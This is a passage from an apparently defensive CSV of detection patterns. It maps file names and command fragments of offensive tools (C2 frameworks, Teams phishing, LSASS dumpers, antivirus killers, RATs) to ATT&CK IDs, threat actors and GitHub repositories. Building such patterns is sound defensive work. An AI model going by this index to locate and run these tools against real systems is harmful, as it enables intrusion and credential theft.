Sandworm","C2","https://github.com/boku7/BokuLoader","1","0","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","61067" "*teamServer*ZoomAPI.py*",".{0,1000}teamServer.{0,1000}ZoomAPI\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","61068" "*TeamServer.C2Profiles*",".{0,1000}TeamServer\.C2Profiles.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61069" "*TeamServer.exe *github.com*",".{0,1000}TeamServer\.exe\s.{0,1000}github\.com.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","61070" "*Teamserver.exe -c profile.json*",".{0,1000}Teamserver\.exe\s\-c\sprofile\.json.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","61071" "*TeamServer.prop*",".{0,1000}TeamServer\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate 
passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","61072" "*TeamServer/Filters/InjectionFilters*",".{0,1000}TeamServer\/Filters\/InjectionFilters.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61073" "*TeamServer/Pivots/*.*",".{0,1000}TeamServer\/Pivots\/.{0,1000}\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61074" "*TeamServer\TeamServer.*",".{0,1000}TeamServer\\TeamServer\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61075" "*TeamsPhisher.git*",".{0,1000}TeamsPhisher\.git.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61076" "*teamsphisher.log*",".{0,1000}teamsphisher\.log.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61077" "*teamsphisher.py*",".{0,1000}teamsphisher\.py.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black 
Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61078" "*TeamsPhisher-main.zip*",".{0,1000}TeamsPhisher\-main\.zip.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","61079" "*teamstracker-main*",".{0,1000}teamstracker\-main.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","61080" "*teamviewer_passwords.*",".{0,1000}teamviewer_passwords\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61092" "*teamviewer_passwords.rb*",".{0,1000}teamviewer_passwords\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61093" "*TeamViewerDecrypt.ps1*",".{0,1000}TeamViewerDecrypt\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61102" "*Technique #1 - Chop Chop - Create/delete*",".{0,1000}Technique\s\#1\s\-\sChop\sChop\s\-\sCreate\/delete.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","61108" "*techspence/Adeleginator*",".{0,1000}techspence\/Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses 
ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","61109" "*techspence/ScriptSentry*",".{0,1000}techspence\/ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","61110" "*tecknicaltom/dsniff*",".{0,1000}tecknicaltom\/dsniff.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","N/A","3","208","47","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z","61112" "*Teensypreter.ino*",".{0,1000}Teensypreter\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). 
Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","61113" "*teilightomemaucd@gmx.com*",".{0,1000}teilightomemaucd\@gmx\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61114" "*telegram2john.py*",".{0,1000}telegram2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61117" "*TelegramRAT-main*",".{0,1000}TelegramRAT\-main.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","61118" "*TELEMETRY.exe install *",".{0,1000}TELEMETRY\.exe\sinstall\s.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61119" "*TELEMETRY.exe install 
/command:*",".{0,1000}TELEMETRY\.exe\sinstall\s\/command\:.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61120" "*TELEMETRY.exe install /path:*",".{0,1000}TELEMETRY\.exe\sinstall\s\/path\:.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61121" "*TELEMETRY.exe install /url:*",".{0,1000}TELEMETRY\.exe\sinstall\s\/url\:.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","61122" "*TelnetTrojXP (Original Code) by heroin*",".{0,1000}TelnetTrojXP\s\(Original\sCode\)\sby\sheroin.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","61124" "*temp*\pp.exe*",".{0,1000}temp.{0,1000}\\pp\.exe.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","61126" "*temp*KillDefender*",".{0,1000}temp.{0,1000}KillDefender.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","61128" "*temp*lsass_*.dmp*",".{0,1000}temp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","61129" "*temp*whoami.txt*",".{0,1000}temp.{0,1000}whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential 
Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","61130" "*Temp\\rubeus*",".{0,1000}Temp\\\\rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#content","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","61131" "*Temp\dumpert*",".{0,1000}Temp\\dumpert.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos 
- Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","61132" "*Temp\graca.log*",".{0,1000}Temp\\graca\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61133" "*temp\iamahacker.txt*",".{0,1000}temp\\iamahacker\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61134" "*TEMP\ns.exe *",".{0,1000}TEMP\\ns\.exe\s.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. 
","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","61136" "*temp\pbind.exe*",".{0,1000}temp\\pbind\.exe.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","61137" "*temp\stager.exe*",".{0,1000}temp\\stager\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","61138" "*templates*CSExec.cs*",".{0,1000}templates.{0,1000}CSExec\.cs.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","61139" "*templates*HIPS_LIPS_processes.txt*",".{0,1000}templates.{0,1000}HIPS_LIPS_processes\.txt.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with 
some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","61140" "*templates*reflective_assembly_minified.ps1*",".{0,1000}templates.{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","61141" "*templates/http_SCNotification.exe*",".{0,1000}templates\/http_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61142" "*templates/smb_SCNotification.exe*",".{0,1000}templates\/smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61143" "*tenable.com/downloads/nessus*",".{0,1000}tenable\.com\/downloads\/nessus.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61144" "*TerminateProcessFromId(ID(""360rp.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360rp\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through 
process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61145" "*TerminateProcessFromId(ID(""360rps.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360rps\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61146" "*TerminateProcessFromId(ID(""360sd.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360sd\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61147" "*TerminateProcessFromId(ID(""360tray.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""360tray\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","61148" "*TerminateProcessFromId(ID(""ZhuDongFangYu.exe"")*",".{0,1000}TerminateProcessFromId\(ID\(\""ZhuDongFangYu\.exe\""\).{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 
